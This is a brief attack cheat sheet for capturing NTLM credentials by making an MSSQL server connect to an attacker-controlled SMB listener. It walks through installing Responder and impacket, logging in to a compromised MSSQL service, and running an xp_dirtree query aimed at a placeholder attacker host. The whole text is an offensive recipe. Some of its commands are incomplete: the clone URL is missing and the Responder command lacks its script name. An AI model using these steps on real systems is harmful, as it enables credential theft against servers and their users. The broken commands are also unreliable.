SMB Relay Attack with MSSQL xp_dirtree Query to Steal NTLM Credential

Setup Request Capturer

Tools Installation.

git clone
cd Responder/
pip3 install -r requirements.txt
sudo apt install impacket-scripts -y

Run Responder to capture the requests.

sudo python3 -I eth0


Login to compromised MSSQL Service with MSSQL Client.

sudo impacket-mssqlclient <user>:"<password>"@<target host> -p <port> -debug

Run the query to steal SMB’s cred after Login.

xp_dirtree '\\<attacker host>\test';